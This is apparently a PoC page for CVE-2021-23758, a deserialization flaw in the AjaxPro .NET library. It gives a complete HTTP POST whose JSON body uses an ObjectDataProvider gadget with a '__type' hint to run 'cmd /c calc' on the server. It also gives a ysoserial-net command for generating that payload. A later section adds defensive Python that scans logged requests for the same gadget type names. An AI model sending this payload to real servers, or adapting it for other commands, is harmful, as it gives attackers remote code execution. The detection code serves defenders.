## https://sploitus.com/exploit?id=9C5F7BCE-0D32-524F-AFDE-810763D8D028
# CVE-2021-23758-POC


This repo was created for training on the vulnerability in AjaxPro disclosed with the ID number CVE-2021-23758.


# POC 

```
POST /ajaxpro/CVE_2021_23758_POC.demo,CVE_2021_23758.ashx HTTP/2
Host: localhost:44375
Content-Length: 567
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96"
X-Ajaxpro-Method: TestAjax
Content-Type: text/plain; charset=UTF-8
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Accept: */*
Origin: https://localhost:44375
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://localhost:44375/demo
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7

{"obj":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
        "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "StartInfo": {
            "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
            "FileName":"cmd",
			"Arguments":"/c calc"
        }
    }
}}
```

```
ysoserial-net -g ObjectDataProvider -f JavaScriptSerializer -c "calc" -o raw
```

![Back-Code](img/repo.jpg?raw=true "B-Code")

![Code](img/code.jpg?raw=true "Code")

![Exploit](img/calc.jpg?raw=true "Calc")
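
A defender-side check for the request shape shown above, as an added example that is not part of the original repo: it walks the JSON body of a logged AjaxPro call and reports every `__type` hint, rating the two type names from the PoC request as high. The function names, the `HIGH_RISK` list, the sample path `/ajaxpro/demo.ashx` and the trimmed sample body are assumptions of this example.

```python
import json

# Assumption: name prefixes rated "high"; both come from the request shown above.
HIGH_RISK = ("System.Windows.Data.ObjectDataProvider", "System.Diagnostics.Process")

# Constructed sample: only the type hints of the request body, no command fields.
SAMPLE_BODY = ('{"obj":{"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework",'
               '"ObjectInstance":{"__type":"System.Diagnostics.Process, System"}}}')


def find_type_hints(node, path="$"):
    """Yield (json_path, type_name) for every "__type" key at any depth.

    Expects json.loads(..., object_pairs_hook=list): objects arrive as lists of
    (key, value) tuples, so duplicate keys are not silently collapsed.
    """
    if not isinstance(node, list):
        return
    for i, item in enumerate(node):
        if isinstance(item, tuple):  # (key, value) pair of a JSON object
            key, value = item
            if key.lower() == "__type" and isinstance(value, str):
                yield path, value
            else:
                yield from find_type_hints(value, f"{path}.{key}")
        else:  # element of a JSON array
            yield from find_type_hints(item, f"{path}[{i}]")


def inspect_request(path, headers, body):
    """Return [(json_path, type_name, rating)] for one logged request."""
    header_names = {name.lower() for name in headers}
    if "/ajaxpro/" not in path.lower() and "x-ajaxpro-method" not in header_names:
        return []  # not an AjaxPro call
    try:
        doc = json.loads(body, object_pairs_hook=list)
    except ValueError:
        # Body the parser rejects: fall back to a substring check for review.
        return [("$", "<unparsed>", "review")] if "__type" in body else []
    findings = []
    for where, type_name in find_type_hints(doc):
        short = type_name.split(",")[0].strip()  # drop assembly, version, token
        rating = "high" if short.startswith(HIGH_RISK) else "review"
        findings.append((where, short, rating))
    return findings


if __name__ == "__main__":
    for finding in inspect_request("/ajaxpro/demo.ashx", {"X-Ajaxpro-Method": "TestAjax"}, SAMPLE_BODY):
        print(finding)
```

Any `review` finding is worth a look as well: a client-supplied `__type` on an AjaxPro endpoint means the caller is choosing which .NET type the server instantiates.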


# Reference
 * [2021-23758 Mitre](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-23758)
 * [michaelschwarz/Ajax.NET-Professional](https://github.com/michaelschwarz/Ajax.NET-Professional)
 * [Details](https://mp.weixin.qq.com/s/7y-iyMMZAoN4B2dGvCFvXg)
 * [sirifu4k1 tweet](https://twitter.com/sirifu4k1/status/1470647490546393089)
 * [ysoserial](https://github.com/pwntester/ysoserial.net)